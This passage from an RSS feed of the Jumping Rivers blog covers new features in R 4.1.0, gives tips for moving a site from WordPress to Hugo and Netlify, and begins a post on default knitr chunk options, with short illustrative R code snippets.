&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;^&amp;#34;&lt;/span&gt;, x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grep&lt;/span&gt;(pattern, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:datasets&amp;#34;&lt;/span&gt;), value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, ignore.case &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this syntax, the final example in the native-pipe section (above)
could be rewritten in this manner:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dogs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;cats&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rats&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {&lt;span style="color:#d2a8ff;font-weight:bold"&gt;\&lt;/span&gt;(x) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;at&amp;#34;&lt;/span&gt;, x)}()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="minor-changes"&gt;Minor changes&lt;/h2&gt;
&lt;h3 id="combining-factors"&gt;Combining factors&lt;/h3&gt;
&lt;p&gt;In earlier versions of R, if two factors were combined together using
&lt;code&gt;c(factor1, factor2)&lt;/code&gt;, the result was an integer vector:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5: Combining factors with different levels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;b&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] 1 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5: Combining factors with identical levels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] 1 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This happens because factors are stored internally as integers. In R &amp;gt;=
4.1, the results are a little more sensible. Combining two factors
together:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;generates a new factor,&lt;/li&gt;
&lt;li&gt;with levels that are a combination of the levels in the original
factors.&lt;/li&gt;
&lt;/ul&gt;
&lt;!-- end list --&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fac1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;d&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fac2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;c&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(fac1, fac2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [1] a b d b c&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Levels: a b d c&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that this is consistent with how &lt;code&gt;forcats::fct_c()&lt;/code&gt; combines
factors together.&lt;/p&gt;
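&lt;p&gt;If the same code has to run on both sides of this change, one option is to build the combined factor explicitly rather than rely on &lt;code&gt;c()&lt;/code&gt;. The following is only a minimal sketch of that idea; the helper name &lt;code&gt;combine_factors()&lt;/code&gt; is hypothetical and is not part of base R or {forcats}:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: combine two factors without relying on c()
# Levels of &amp;#39;x&amp;#39; come first, followed by any levels that only occur in &amp;#39;y&amp;#39;
combine_factors = function(x, y) {
  factor(
    c(as.character(x), as.character(y)),
    levels = union(levels(x), levels(y))
  )
}

fac1 = factor(c(&amp;#34;a&amp;#34;, &amp;#34;b&amp;#34;, &amp;#34;d&amp;#34;))
fac2 = factor(c(&amp;#34;b&amp;#34;, &amp;#34;c&amp;#34;))
combined = combine_factors(fac1, fac2)
levels(combined)
# [1] &amp;#34;a&amp;#34; &amp;#34;b&amp;#34; &amp;#34;d&amp;#34; &amp;#34;c&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;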
&lt;h3 id="splitting-data-frames-using-formula-syntax"&gt;Splitting data-frames using formula syntax&lt;/h3&gt;
&lt;p&gt;A nice shorthand has been introduced for splitting data-frames that uses
formula syntax. To do this, you originally had to duplicate the name of
the data-frame in the call to &lt;code&gt;split()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5: Separate the car models in &amp;#39;mtcars&amp;#39; by their number of gears&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;split&lt;/span&gt;(mtcars, mtcars&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;gear)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When used in a {magrittr} pipeline, that syntax looks rather clunky:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.0.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Get the car-model with the highest &amp;#39;mpg&amp;#39; for cars with 3, 4, 5 gears separately&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;split&lt;/span&gt;(., .$gear) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lapply&lt;/span&gt;(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) x&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[which.max&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mpg), ])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Combining the new pipeline syntax and the function shorthand together
with the new syntax for &lt;code&gt;split&lt;/code&gt;, the latter can be rewritten as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;split&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; gear) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lapply&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;\&lt;/span&gt;(x) x&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[which.max&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mpg), ])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
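&lt;p&gt;As a quick sanity check (a sketch that assumes R 4.1.0 or later; the object names are ours), the formula form should produce the same groups as the older call:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Formula syntax, requires R &amp;gt;= 4.1
by_formula = split(mtcars, ~ gear)
# Older syntax, repeating the name of the data-frame
by_vector = split(mtcars, mtcars$gear)

# Both give one data-frame per number of gears
names(by_formula)
# [1] &amp;#34;3&amp;#34; &amp;#34;4&amp;#34; &amp;#34;5&amp;#34;
identical(names(by_formula), names(by_vector))
# Number of car models in each group
sapply(by_formula, nrow)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;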
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Tips &amp; tricks when moving to Hugo</title><link>https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/</link><pubDate>Mon, 29 Mar 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Over Christmas we moved our &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;main site&lt;/a&gt;
from Wordpress to Hugo &amp;amp; Netlify. The main benefits for us moving to
&lt;a href="https://gohugo.io/" rel="external"&gt;Hugo&lt;/a&gt; were&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Security. We were always getting emails about various Wordpress
plugins. As our site was essentially static, this was an additional
maintenance task.&lt;/li&gt;
&lt;li&gt;Site-speed. Although Wordpress has lots of clever plugins for
optimising site-speed (which then leads to the situation above),
Wordpress is just “big”.&lt;/li&gt;
&lt;li&gt;Raw cost. By this I mean web-site fees. This wasn’t actually a
driver for us. The Hugo site is certainly cheaper and we save
~£1,000 per year. But for a commercial site, this cost is dwarfed
by the next point.&lt;/li&gt;
&lt;li&gt;Time: Everything took longer with Wordpress. Our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training
courses&lt;/a&gt; are
all located in GitLab. So updating our Wordpress site would involve
copying and pasting. This either took a significant amount of time
or simply wasn’t done. Either situation wasn’t great.&lt;/li&gt;
&lt;li&gt;More time: As we didn’t use Wordpress on a day-to-day basis, there
was also an overhead of trying to remember what to do.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It’s worth pointing out that Hugo isn’t always better than Wordpress.
In fact, we are currently setting up a small Wordpress site to handle
payment for a neat Shiny application we’re working on with a client.
It’s all about using the best tools for each job.&lt;/p&gt;
&lt;p&gt;Overall, the move has certainly been worthwhile, and my only regret
is not doing it earlier. In saying that, there have been issues. So if
you plan on moving, hopefully the following will help.&lt;/p&gt;
&lt;h2 id="pay-for-netlify-analytics"&gt;Pay for Netlify Analytics&lt;/h2&gt;
&lt;p&gt;If you use Netlify, they offer their own analytics service for $9 per
month. Initially, I couldn’t figure out why you would use this over (say)
Google Analytics. However, Netlify Analytics doesn’t track users; it tells you
about hits to your site. More importantly, it tells you about pages
returning 404s, i.e. broken links. Even though we spent a long time
ensuring we had redirects in place before switching on Hugo, there were
still dozens of 404s appearing. These links are nicely highlighted via
Netlify Analytics. Sometimes a link is broken because you’ve deleted a
page; other times you’ve made a typo in an internal link. Either way,
fix them.&lt;/p&gt;
&lt;p&gt;However, you’re never going to get the number of “broken links” to zero,
as you will have a low level of bot noise. Our current analytics show a
list of missing Wordpress files that bots have probed for:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/netlify-analytics.png" title="Netlify analytics for jumpingrivers.com" alt="Netlify analytics for jumpingrivers.com" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;h2 id="optimise-your-assets"&gt;Optimise your Assets&lt;/h2&gt;
&lt;p&gt;Netlify lets you easily optimise your web assets. Under &lt;code&gt;Build and Deploy&lt;/code&gt;, you can select which assets to optimise.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/optimise-assets.png" title="Optimise your assets " alt="Optimise your assets " style="width:450px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Minifying is the process where you minimise your CSS and JS files by
removing all comments and spaces, simplifying variable names, etc. For
example, this is the Jumping Rivers &lt;a href="https://d33wubrfki0l68.cloudfront.net/bundles/315a145833a5ec1ef53cb36d3ee4f7b62872a05a.css" rel="external"&gt;minified
CSS&lt;/a&gt;.
Clearly, we don’t write CSS in this way. But it’s been automatically
optimised for web-delivery.&lt;/p&gt;
&lt;p&gt;We implemented lossless compression for images and pretty URLs. The
latter tweaks URLs to avoid redirects. For example,
&lt;a href="https://www.jumpingrivers.com/about/" rel="external"&gt;jumpingrivers.com/about&lt;/a&gt; would
redirect to
&lt;a href="https://www.jumpingrivers.com/about/" rel="external"&gt;jumpingrivers.com/about/&lt;/a&gt;, so
Netlify adds the &lt;code&gt;/&lt;/code&gt; to the links.&lt;/p&gt;
&lt;p&gt;There are lots of other plugins available for optimising site-speed.
However, we have not tried them, as our site is fast enough and this is
a commercial site. We want to minimise the risk of things going wrong.&lt;/p&gt;
&lt;h2 id="use-google-site-speed"&gt;Use Google Site Speed&lt;/h2&gt;
&lt;p&gt;If you are moving to Hugo from an existing site, then it’s worth getting
a before and after via &lt;a href="https://developers.google.com/speed/pagespeed/insights/" rel="external"&gt;Google site
speed&lt;/a&gt;. This
step is nice, because it lets you see that all your hard work hasn’t
been in vain! Be warned, it’s easy to obsess about shaving off
micro-seconds from your page loading times. Resist this temptation!&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/site-speed.png" title="Google site speed for jumpingrivers.com" alt="Google site speed for jumpingrivers.com" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;h2 id="check-your-rss-feed"&gt;Check your RSS Feed&lt;/h2&gt;
&lt;p&gt;When we initially moved our site, our blog posts weren’t picked up by
R-bloggers. With the help of Tal Galili, we discovered a few issues with
our feed; the ultimate problem was at R-bloggers, but the other issues
didn’t help.&lt;/p&gt;
&lt;p&gt;To debug our RSS feed, we used&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://simplepie.org/demo/" rel="external"&gt;https://simplepie.org/demo/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://validator.w3.org/feed/" rel="external"&gt;https://validator.w3.org/feed/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;for quick tests.&lt;/p&gt;
&lt;h2 id="creating-blog-posts-using-rmarkdown"&gt;Creating blog posts using Rmarkdown&lt;/h2&gt;
&lt;p&gt;The majority of our blog posts have an &lt;code&gt;R&lt;/code&gt; flavour and are created using
Rmarkdown and {knitr}. Obviously loving all things R, we decided to
create a simple &lt;a href="https://github.com/jumpingrivers/hugo-rmd" rel="external"&gt;R package&lt;/a&gt;
to make this process easier. Our R package (which will never be on
CRAN), provides solutions to a few common issues.&lt;/p&gt;
&lt;p&gt;The package gives a consistent set of {knitr} options and hooks. For our
blog posts, we now call the functions
&lt;code&gt;hugostyle::set_knitr_chunk_options()&lt;/code&gt; and
&lt;code&gt;hugostyle::set_knitr_hooks()&lt;/code&gt; at the top of our &lt;code&gt;Rmd&lt;/code&gt; file. For a
summary of options, see our &lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;last blog
post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This package also provides an alternative output style. Instead of using
&lt;code&gt;html_standard&lt;/code&gt; within our YAML header, we use &lt;code&gt;hugostyle::hugo_md&lt;/code&gt;.
This markdown variant has a small tweak to enforce the use of the
&lt;code&gt;fig.alt&lt;/code&gt; option on our {knitr} images; in the past this was something we
often forgot to add. The template also adds absolute links to our
{knitr} images (see next section).&lt;/p&gt;
&lt;h2 id="absolute-links-for-knitr-images"&gt;Absolute Links for {knitr} Images&lt;/h2&gt;
&lt;p&gt;One of the issues we discovered with our RSS feed (an issue prevalent
on most blogs) is that simple RSS readers don’t understand relative
links to images, e.g. &lt;code&gt;/page/image.png&lt;/code&gt; vs
&lt;code&gt;https://www.jumpingrivers.com/page/image.png&lt;/code&gt;. This can be solved using
a &lt;a href="https://gohugo.io/content-management/shortcodes/" rel="external"&gt;&lt;code&gt;shortcode&lt;/code&gt;&lt;/a&gt;. A
shortcode allows us to insert code during the Hugo build stage. In our
case, we created a file &lt;code&gt;layouts/shortcodes/url.html&lt;/code&gt; that contained the
value &lt;code&gt;{{ .Page.Permalink }}&lt;/code&gt;. In our modified markdown template, we
automatically prefix all relative URLs with &lt;code&gt;{{&amp;amp;lt; url &amp;amp;gt;}}&lt;/code&gt;. This
means that when we render locally, the URL is &lt;code&gt;localhost:1313&lt;/code&gt;, and when we
render on Netlify, it’s
&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;https://www.jumpingrivers.com&lt;/a&gt;&lt;/p&gt;
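&lt;p&gt;The template code itself isn’t shown in this post, but the underlying idea (turning root-relative image links into absolute ones) can be sketched in base R. This is an illustration only, not the {hugostyle} implementation: the function name &lt;code&gt;prefix_image_links()&lt;/code&gt; is hypothetical, and the regular expression only handles markdown image links that start with a single &lt;code&gt;/&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: prefix root-relative markdown image links with a base URL
prefix_image_links = function(md, base_url) {
  base_url = sub(&amp;#34;/+$&amp;#34;, &amp;#34;&amp;#34;, base_url) # drop any trailing slash
  # Match &amp;#34;](/path)&amp;#34; but leave absolute links such as &amp;#34;](https://...)&amp;#34; alone
  gsub(&amp;#34;\\]\\(/([^/)][^)]*)\\)&amp;#34;, paste0(&amp;#34;](&amp;#34;, base_url, &amp;#34;/\\1)&amp;#34;), md)
}

prefix_image_links(
  &amp;#34;![Site speed](/page/image.png)&amp;#34;,
  &amp;#34;https://www.jumpingrivers.com/&amp;#34;
)
# [1] &amp;#34;![Site speed](https://www.jumpingrivers.com/page/image.png)&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Doing the substitution at build time with a shortcode, as described above, has the advantage that the same source file works both locally and on Netlify.&lt;/p&gt;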
&lt;h3 id="references"&gt;References&lt;/h3&gt;
&lt;p&gt;If you are interested in moving to Hugo, then these posts are also worth
reading&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In-depth guide to &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;{knitr} and
images&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Tips and tricks with &lt;a href="https://ropensci.org/blog/2020/04/23/rmd-learnings/" rel="external"&gt;Rmd’s and
Hugo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Getting started with &lt;a href="https://alison.rbind.io/post/2019-02-21-hugo-page-bundles/" rel="external"&gt;Hugo &amp;amp;
R&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Default knitr options and hooks</title><link>https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/</link><pubDate>Fri, 12 Mar 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/featured.jpeg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part four of our four part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Specifying the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct figure
dimension&lt;/a&gt;
in {knitr}.&lt;/li&gt;
&lt;li&gt;Part 2: What &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;image
format&lt;/a&gt;
should you use for graphics.&lt;/li&gt;
&lt;li&gt;Part 3: Including &lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/" rel="external"&gt;external
graphics&lt;/a&gt;
in your document&lt;/li&gt;
&lt;li&gt;Part 4: Setting default {knitr} options (&lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;this
post&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As with many aspects of programming, when you are working by yourself
you can be (slightly) more lax with styles and set-up. However, as you
start working in a team, different styles can quickly become a hindrance
and lead to errors.&lt;/p&gt;
&lt;p&gt;Using &lt;a href="https://github.com/yihui/knitr" rel="external"&gt;{knitr}&lt;/a&gt; is no different. When
you work on documents with different team members, it’s helpful to have
a consistent set of settings. If the default for &lt;code&gt;eval&lt;/code&gt; changes, this
can easily waste time as you try to track down an error. At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping
Rivers&lt;/a&gt;, we use {knitr} a lot. From our
training courses, to providing feedback to clients, to constructing
monthly reports on &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/" rel="external"&gt;clients’
infrastructure&lt;/a&gt;.
The great thing about {knitr} is it’s really easy to customise. The bad
thing is that without some care, it’s really easy for every member of
the team to have different default options. This proliferation of
different defaults means that when we pick up someone else’s
document, mistakes may creep in.&lt;/p&gt;
&lt;p&gt;We’ve found that to work effectively as a team, we need a consistent set
of global settings. To be honest, it isn’t really &lt;em&gt;that&lt;/em&gt; important what
the options are, it’s more crucial that they exist. In this post, we’ll
describe the standard {knitr} options we have and use.&lt;/p&gt;
&lt;h2 id="code-chunks"&gt;Code Chunks&lt;/h2&gt;
&lt;p&gt;These options ensure that code chunks perform in a standard manner. The
options below are relatively standard&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;echo&lt;/code&gt;: for our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training
courses&lt;/a&gt;, this
is set to &lt;code&gt;TRUE&lt;/code&gt;. For reports to clients, setting this to &lt;code&gt;FALSE&lt;/code&gt;
usually makes more sense.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;collapse = TRUE&lt;/code&gt;: if possible, collapse all the source/output
blocks from a single chunk into one block.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;comment = &amp;quot;#&amp;gt;&amp;quot;&lt;/code&gt;: prefix each line of output with &lt;code&gt;#&amp;gt;&lt;/code&gt;. The default is &lt;code&gt;##&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
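&lt;p&gt;Put together, the chunk options above could be set once in the first chunk of a document. This is a minimal sketch using &lt;code&gt;knitr::opts_chunk$set()&lt;/code&gt;, with the values taken from the list above; it is not a copy of our internal set-up:&lt;/p&gt;
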